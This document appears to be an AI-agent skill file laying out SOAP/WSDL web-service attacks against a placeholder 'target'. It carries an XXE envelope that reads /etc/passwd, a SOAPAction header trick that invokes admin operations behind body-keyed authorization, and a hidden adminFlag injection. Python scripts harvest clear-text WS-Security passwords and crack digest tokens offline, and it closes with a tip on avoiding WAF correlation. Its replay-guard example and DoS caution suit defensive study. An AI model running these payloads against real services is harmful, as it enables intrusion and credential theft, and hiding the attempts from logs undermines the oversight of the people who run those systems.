api-soap-wsdl
SOAP / WSDL exploitation — WSDL enumeration via ?wsdl, XXE in SOAP envelope, WS-Addressing replay, WS-Security UsernameToken brute, SAML token injection in WS-Trust, schema validation bypass.
| name | api-soap-wsdl |
| description | SOAP / WSDL exploitation — WSDL enumeration via ?wsdl, XXE in SOAP envelope, WS-Addressing replay, WS-Security UsernameToken brute, SAML token injection in WS-Trust, schema validation bypass. |
| allowed-tools | Bash Read Write |
| metadata | {"when_to_use":"soap wsdl xml ws-security ws-addressing ws-trust saml asmx wcf .asmx .svc spring-ws","subdomain":"api","tags":"soap, wsdl, xml, ws-security","mitre_attack":"T1190, T1203"} |
Legacy enterprise integrations still ship SOAP — payment processors, ERP middleware, government APIs, Java EE bus systems.
# WSDL endpoints — try ?wsdl on any .asmx (.NET) / .svc (WCF) / Spring-WS endpoint
curl -sk "https://target/Service.asmx?wsdl" | xmllint --format -
curl -sk "https://target/Service.svc?wsdl" | xmllint --format -
# Inspect the service from the WSDL: zeep dumps bindings, operations and types; wsdl2java (Axis2) generates client stubs
python -m zeep https://target/Service.asmx?wsdl
# OR
wsdl2java -uri https://target/Service.asmx?wsdl
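What to pull out of a ?wsdl response before anything else: endpoint addresses, bindings, operation names and the per-operation soapAction values (the SOAPAction routing trick below needs exactly those). The script below is an added example, not part of this page or of any tool it names; the WSDL it parses is constructed to look like a .NET ASMX service, and the host, namespace and operation names in it are hypothetical. With a URL argument it fetches the real WSDL like curl -sk would.

```python
"""Added example (not from the page): enumerate the attack surface in a WSDL offline.
SAMPLE_WSDL is constructed; host, namespace and operation names are hypothetical."""
import json
import ssl
import sys
import urllib.request
import xml.etree.ElementTree as ET

NS = {
    "wsdl": "http://schemas.xmlsoap.org/wsdl/",
    "soap": "http://schemas.xmlsoap.org/wsdl/soap/",
    "soap12": "http://schemas.xmlsoap.org/wsdl/soap12/",
}

# Operation names worth a second look when they show up in a public WSDL.
INTERESTING = ("admin", "delete", "exec", "debug", "upload", "config", "password", "sql", "user")

SAMPLE_WSDL = """<?xml version="1.0" encoding="utf-8"?>
<wsdl:definitions xmlns:wsdl="http://schemas.xmlsoap.org/wsdl/"
    xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/"
    xmlns:soap12="http://schemas.xmlsoap.org/wsdl/soap12/"
    xmlns:tns="http://target/" targetNamespace="http://target/">
  <wsdl:portType name="ServiceSoap">
    <wsdl:operation name="PublicMethod"/>
    <wsdl:operation name="AdminMethod"/>
  </wsdl:portType>
  <wsdl:binding name="ServiceSoap" type="tns:ServiceSoap">
    <soap:binding transport="http://schemas.xmlsoap.org/soap/http"/>
    <wsdl:operation name="PublicMethod"><soap:operation soapAction="http://target/PublicMethod"/></wsdl:operation>
    <wsdl:operation name="AdminMethod"><soap:operation soapAction="http://target/AdminMethod"/></wsdl:operation>
  </wsdl:binding>
  <wsdl:binding name="ServiceSoap12" type="tns:ServiceSoap">
    <soap12:binding transport="http://schemas.xmlsoap.org/soap/http"/>
    <wsdl:operation name="AdminMethod"><soap12:operation soapAction="http://target/AdminMethod"/></wsdl:operation>
  </wsdl:binding>
  <wsdl:service name="Service">
    <wsdl:port name="ServiceSoap" binding="tns:ServiceSoap"><soap:address location="https://target/Service.asmx"/></wsdl:port>
    <wsdl:port name="ServiceSoap12" binding="tns:ServiceSoap12"><soap12:address location="https://target/Service.asmx"/></wsdl:port>
  </wsdl:service>
</wsdl:definitions>"""


def enumerate_wsdl(wsdl_xml):
    """Return the target namespace and, per endpoint, its URL and operation -> SOAPAction map."""
    root = ET.fromstring(wsdl_xml)
    bindings = {}
    for binding in root.findall("wsdl:binding", NS):
        ops = {}
        for op in binding.findall("wsdl:operation", NS):
            so = op.find("soap:operation", NS)
            if so is None:  # SOAP 1.2 binding
                so = op.find("soap12:operation", NS)
            ops[op.get("name")] = so.get("soapAction", "") if so is not None else ""
        bindings[binding.get("name")] = ops
    endpoints = []
    for service in root.findall("wsdl:service", NS):
        for port in service.findall("wsdl:port", NS):
            binding_name = port.get("binding", "").split(":")[-1]  # strip the tns: prefix
            addr = port.find("soap:address", NS)
            if addr is None:
                addr = port.find("soap12:address", NS)
            endpoints.append({
                "service": service.get("name"),
                "port": port.get("name"),
                "location": addr.get("location") if addr is not None else None,
                "operations": bindings.get(binding_name, {}),
            })
    return {"target_namespace": root.get("targetNamespace"), "endpoints": endpoints}


def interesting_operations(summary, keywords=INTERESTING):
    """Sorted operation names whose name contains a sensitive keyword (case-insensitive)."""
    names = {op for ep in summary["endpoints"] for op in ep["operations"]}
    return sorted(n for n in names if any(k in n.lower() for k in keywords))


def fetch_wsdl(url):
    """Fetch like curl -sk: certificate verification disabled for engagement targets with bad certs."""
    ctx = ssl._create_unverified_context()
    with urllib.request.urlopen(url, context=ctx, timeout=15) as resp:
        return resp.read().decode("utf-8", "replace")


if __name__ == "__main__":
    wsdl = fetch_wsdl(sys.argv[1]) if len(sys.argv) > 1 else SAMPLE_WSDL
    summary = enumerate_wsdl(wsdl)
    print(json.dumps(summary, indent=2))
    print("interesting:", interesting_operations(summary))
```

Run it against the sample to see both the SOAP 1.1 and 1.2 ports of the same .asmx listed with their soapAction URIs; those URIs are what goes into the SOAPAction header later on this page.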
# Inline XXE: the external entity only fires if the server's XML parser resolves DTD entities; look for the file contents echoed in the response or in a parse/fault message
curl -sk -X POST -H "Content-Type: text/xml" -H 'SOAPAction: "http://target/Method"' \
-d '<?xml version="1.0"?>
<!DOCTYPE r [<!ENTITY x SYSTEM "file:///etc/passwd">]>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tns="http://target/">
<soap:Body><tns:Method><tns:arg>&x;</tns:arg></tns:Method></soap:Body>
</soap:Envelope>' https://target/Service.asmx
The <wsse:UsernameToken> often carries <wsse:Password> in clear text (Type ending in #PasswordText, which is also the default when Type is absent). If the channel is plain HTTP, or a proxy or log sink keeps payloads, harvest credentials straight from the traffic. The #PasswordDigest variant is Base64(SHA-1(nonce + created + password)); a captured digest with its nonce and Created value can be checked against candidate passwords offline.
# WS-Policy may demand: Type="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-username-token-profile-1.0#PasswordText"
curl -sk -X POST -H "Content-Type: text/xml" -d @ws-attack.xml https://target/svc
# Brute: cycle a username dict (then passwords), compare response time and fault class; a different fault for unknown user vs. wrong password is user enumeration
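The harvest-and-verify logic for both password types, as an added example that is not part of this page: it parses a captured envelope, returns the clear-text credential for PasswordText, and for PasswordDigest recomputes the profile's digest for each wordlist entry. The envelopes, user name, password and nonce are constructed here; the namespace and Type URIs are the OASIS ones.

```python
"""Added example (not from the page): harvest a WS-Security UsernameToken from a
captured envelope, or verify candidate passwords offline against a #PasswordDigest.
Sample user, password, nonce and Created value are constructed."""
import base64
import hashlib
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

SOAP = "http://schemas.xmlsoap.org/soap/envelope/"
WSSE = "http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd"
WSU = "http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd"
PROFILE = "http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-username-token-profile-1.0"
B64 = "http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary"
NS = {"soap": SOAP, "wsse": WSSE, "wsu": WSU}

# Constructed sample values; the nonce is the Base64 of 16 arbitrary bytes.
SAMPLE_NONCE = base64.b64encode(b"0123456789abcdef").decode()
SAMPLE_CREATED = "2024-01-01T00:00:00Z"


def password_digest(nonce_b64, created, password):
    """Username Token Profile 1.0: Base64(SHA-1(nonce || created || password)),
    where nonce is the decoded bytes, not its Base64 text."""
    raw = base64.b64decode(nonce_b64) + created.encode() + password.encode()
    return base64.b64encode(hashlib.sha1(raw).digest()).decode()


def build_envelope(user, password, nonce_b64, created, digest=False):
    """What a client sends; a brute-force loop varies user/password here."""
    kind = "PasswordDigest" if digest else "PasswordText"
    value = password_digest(nonce_b64, created, password) if digest else escape(password)
    return (
        f'<soap:Envelope xmlns:soap="{SOAP}"><soap:Header>'
        f'<wsse:Security xmlns:wsse="{WSSE}" xmlns:wsu="{WSU}"><wsse:UsernameToken>'
        f'<wsse:Username>{escape(user)}</wsse:Username>'
        f'<wsse:Password Type="{PROFILE}#{kind}">{value}</wsse:Password>'
        f'<wsse:Nonce EncodingType="{B64}">{nonce_b64}</wsse:Nonce>'
        f'<wsu:Created>{created}</wsu:Created>'
        '</wsse:UsernameToken></wsse:Security></soap:Header><soap:Body/></soap:Envelope>'
    )


def extract_token(envelope_xml):
    """Pull the UsernameToken fields out of a captured envelope (empty dict if none)."""
    tok = ET.fromstring(envelope_xml).find(".//wsse:UsernameToken", NS)
    if tok is None:
        return {}
    pw = tok.find("wsse:Password", NS)
    return {
        "username": tok.findtext("wsse:Username", namespaces=NS),
        "password": pw.text if pw is not None else None,
        # The profile's default when Type is absent is PasswordText.
        "type": pw.get("Type", f"{PROFILE}#PasswordText") if pw is not None else None,
        "nonce": tok.findtext("wsse:Nonce", namespaces=NS),
        "created": tok.findtext("wsu:Created", namespaces=NS),
    }


def harvest(envelope_xml, wordlist=()):
    """(username, password) for PasswordText; for PasswordDigest the first wordlist
    entry whose digest matches, else (username, None). None if no token at all."""
    tok = extract_token(envelope_xml)
    if not tok or tok["type"] is None:
        return None
    if tok["type"].endswith("#PasswordText"):
        return tok["username"], tok["password"]
    for candidate in wordlist:
        if password_digest(tok["nonce"], tok["created"], candidate) == tok["password"]:
            return tok["username"], candidate
    return tok["username"], None


if __name__ == "__main__":
    captured = build_envelope("svc_user", "Winter2024!", SAMPLE_NONCE, SAMPLE_CREATED, digest=True)
    print(extract_token(captured))
    print(harvest(captured, ["password", "Winter2024!"]))
```

The offline digest check is why PasswordDigest over HTTP is still a finding: the nonce and Created value travel with the token, so a sniffed token is a crackable hash, not a secret.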
SOAP responses often include <wsa:RelatesTo> echoing the request's <wsa:MessageID>. Some servers neither enforce MessageID uniqueness nor check the <wsu:Timestamp> window, so a captured request can be resent unchanged (replay), or its MessageID reused in a new request:
<wsa:MessageID>uuid:CAPTURED_FROM_LEGITIMATE_REQUEST</wsa:MessageID>
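The freshness check that is missing when replay works, as an added example (not from the page): a small server-side guard that rejects a reused <wsa:MessageID> and a <wsu:Timestamp> outside its window. Read it from the tester's side too: each rejection reason that a target fails to produce is a finding. Envelopes, IDs, timestamps and the action URI are constructed.

```python
"""Added example (not from the page): MessageID replay cache plus Timestamp window,
the checks a WS-Addressing / WS-Security endpoint should apply. Sample data constructed."""
import xml.etree.ElementTree as ET
from datetime import datetime, timedelta, timezone

NS = {
    "soap": "http://schemas.xmlsoap.org/soap/envelope/",
    "wsa": "http://www.w3.org/2005/08/addressing",
    "wsse": "http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd",
    "wsu": "http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd",
}


def envelope(message_id, created, expires, action="http://target/PublicMethod"):
    """A request carrying wsa:MessageID and a wsu:Timestamp (hypothetical action URI)."""
    return (
        f'<soap:Envelope xmlns:soap="{NS["soap"]}" xmlns:wsa="{NS["wsa"]}" '
        f'xmlns:wsse="{NS["wsse"]}" xmlns:wsu="{NS["wsu"]}"><soap:Header>'
        f'<wsa:Action>{action}</wsa:Action><wsa:MessageID>{message_id}</wsa:MessageID>'
        f'<wsse:Security><wsu:Timestamp><wsu:Created>{created}</wsu:Created>'
        f'<wsu:Expires>{expires}</wsu:Expires></wsu:Timestamp></wsse:Security>'
        '</soap:Header><soap:Body/></soap:Envelope>'
    )


def parse_ts(text):
    """wsu timestamps are xsd:dateTime in UTC with a trailing Z."""
    return datetime.fromisoformat(text.replace("Z", "+00:00"))


class ReplayGuard:
    """Reject reused MessageIDs and out-of-window Timestamps. A MessageID only has to
    be remembered until its Expires (plus clock skew) has passed, so the cache stays bounded."""

    def __init__(self, skew=timedelta(minutes=5)):
        self.skew = skew
        self.seen = {}  # MessageID -> Expires

    def check(self, xml_text, now=None):
        now = now or datetime.now(timezone.utc)
        root = ET.fromstring(xml_text)
        mid = root.findtext("soap:Header/wsa:MessageID", namespaces=NS)
        ts = root.find(".//wsu:Timestamp", NS)
        if not mid or ts is None:
            return False, "missing MessageID or Timestamp"
        created = parse_ts(ts.findtext("wsu:Created", namespaces=NS))
        expires = parse_ts(ts.findtext("wsu:Expires", namespaces=NS))
        if created > now + self.skew:
            return False, "created in the future"
        if expires < now - self.skew:
            return False, "expired"
        # Drop IDs whose window has closed; anything still inside it cannot be reused.
        self.seen = {m: e for m, e in self.seen.items() if e >= now - self.skew}
        if mid in self.seen:
            return False, "replay"
        self.seen[mid] = expires
        return True, "ok"


if __name__ == "__main__":
    now = parse_ts("2024-01-01T12:00:00Z")
    guard = ReplayGuard()
    msg = envelope("uuid:11111111-1111-1111-1111-111111111111", "2024-01-01T11:59:00Z", "2024-01-01T12:04:00Z")
    print(guard.check(msg, now))   # accepted
    print(guard.check(msg, now))   # same MessageID again: replay
```

Note that the Timestamp only protects against replay if it sits inside the signed part of the message; an unsigned Timestamp is just a hint the attacker can rewrite.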
WS-Trust 1.3 RequestSecurityToken (RST) / RSTR flows accept SAML assertions as proof of identity. If the IdP's signing key has leaked, re-sign a modified assertion; otherwise try XML Signature Wrapping (XSW), where the signed assertion stays intact and an unsigned copy with altered claims is placed where the consumer actually reads it. See the SAML skill for the full XSW patterns.
Many servers parse and deserialize the SOAP body before (or instead of) validating it against the XSD. If the binder maps child elements to properties by name and silently ignores unknown ones, an element absent from the schema but present on the server-side type gets set:
<soap:Body>
<tns:Method>
<tns:adminFlag>true</tns:adminFlag> <!-- not in the WSDL's XSD; honored if the binder maps it to a property -->
<tns:arg>value</tns:arg>
</tns:Method>
</soap:Body>
Entity expansion probe. This 3-level payload expands to only 2,400 bytes (8 x 10 x 10 x 3), so it is a safe test of whether the server expands DTD-declared entities at all (reflected value, fault text or response time); the 10-level "billion laughs" version of the same shape expands to tens of gigabytes and is a DoS, not a probe.
<!DOCTYPE x [<!ENTITY a "12345678"><!ENTITY b "&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;"><!ENTITY c "&b;&b;&b;&b;&b;&b;&b;&b;&b;&b;">]>
<x>&c;&c;&c;</x>
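Before sending a DTD payload it is worth knowing what it will do: which entities are external (XXE candidates) and how many bytes the internal ones would expand to. The analyser below is an added example, not part of the page; it computes the expansion size by counting rather than materializing it, refuses recursive entity graphs, and regenerates the page's 3-level payload (and its 10-level cousin) from a generator. The XXE sample it checks is a constructed copy of the page's probe body.

```python
"""Added example (not from the page): size up a DTD payload before sending it.
Reports SYSTEM/PUBLIC entities (XXE candidates) and the byte count the internal
entity references in the body would expand to. XXE_SAMPLE is constructed."""
import re

ENTITY_INTERNAL = re.compile(r'<!ENTITY\s+(\w+)\s+(["\'])(.*?)\2\s*>', re.S)
ENTITY_EXTERNAL = re.compile(r'<!ENTITY\s+(\w+)\s+(SYSTEM|PUBLIC)\s+(["\'])(.*?)\3', re.S)
DOCTYPE = re.compile(r'<!DOCTYPE\s+\w+\s*\[(.*?)\]\s*>', re.S)
REF = re.compile(r'&(\w+);')

# Constructed copy of the page's XXE probe, reduced to its DTD and one reference.
XXE_SAMPLE = ('<?xml version="1.0"?>\n'
              '<!DOCTYPE r [<!ENTITY x SYSTEM "file:///etc/passwd">]>\n'
              '<r>&x;</r>')


def build_laughs(levels=3, fanout=10, seed="12345678", root_refs=3):
    """Nested-entity payload: level 1 is the seed, each further level references the
    previous one `fanout` times, the root references the top level `root_refs` times.
    The defaults reproduce the page's 3-level probe exactly."""
    names = [chr(ord("a") + i) for i in range(levels)]
    decls = [f'<!ENTITY {names[0]} "{seed}">']
    for prev, cur in zip(names, names[1:]):
        refs = f"&{prev};" * fanout
        decls.append(f'<!ENTITY {cur} "{refs}">')
    top = f"&{names[-1]};" * root_refs
    return f'<!DOCTYPE x [{"".join(decls)}]>\n<x>{top}</x>'


def analyse_dtd(xml_text):
    """Return external entities, the expanded size of each internal entity, and the
    total bytes the body's entity references expand to. Raises on recursion."""
    m = DOCTYPE.search(xml_text)
    if not m:
        return {"external": {}, "internal_sizes": {}, "expansion_bytes": 0}
    subset, body = m.group(1), xml_text[m.end():]
    internal = {n: v for n, _q, v in ENTITY_INTERNAL.findall(subset)}
    external = {n: loc for n, _k, _q, loc in ENTITY_EXTERNAL.findall(subset)}
    sizes = {}

    def size(name, stack=()):
        if name in sizes:
            return sizes[name]
        if name in stack:
            raise ValueError(f"recursive entity &{name};")
        if name not in internal:  # external, predefined (&lt;) or undeclared: nothing expands inline
            return 0
        value = internal[name]
        refs = REF.findall(value)
        literal = len(value) - sum(len(r) + 2 for r in refs)  # characters that are not references
        sizes[name] = literal + sum(size(r, stack + (name,)) for r in refs)
        return sizes[name]

    expansion = sum(size(r) for r in REF.findall(body))
    return {"external": external,
            "internal_sizes": {n: size(n) for n in internal},
            "expansion_bytes": expansion}


if __name__ == "__main__":
    print(analyse_dtd(build_laughs()))            # the page's probe: 2400 bytes
    print(analyse_dtd(build_laughs(levels=10))["expansion_bytes"])  # the DoS variant
    print(analyse_dtd(XXE_SAMPLE)["external"])
```

Gate the send on expansion_bytes: anything beyond a few kilobytes is no longer a probe for entity handling but a denial-of-service test, which needs explicit authorization.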
.NET ASMX dispatches on the SOAPAction header by default (SoapServiceRoutingStyle.SoapAction), not on the body's root element. Send an admin operation's SOAPAction with a harmless-looking body: an authorization or WAF rule keyed on the body's operation element sees PublicMethod while the server invokes AdminMethod. (Services set to RoutingStyle = SoapServiceRoutingStyle.RequestElement dispatch on the body instead.)
curl -X POST -H "Content-Type: text/xml" -H 'SOAPAction: "http://target/AdminMethod"' \
-d '<soap:Envelope>...PublicMethod body...</soap:Envelope>' \
https://target/Service.asmx
# SoapUI open source / Postman SOAP requests: interactive probing
soapui.sh # GUI; headless runs via testrunner.sh
# Burp Suite extensions: Wsdler (WSDL parsing), SAML Raider (SAML tampering and XSW payloads)
# python zeep — programmatic SOAP client (good for automation)
python3 -c "from zeep import Client; c = Client('https://target/Service.asmx?wsdl'); print(c.service.Method('arg'))"
Many WAFs log <wsa:MessageID>; randomize it per request so attempts do not correlate.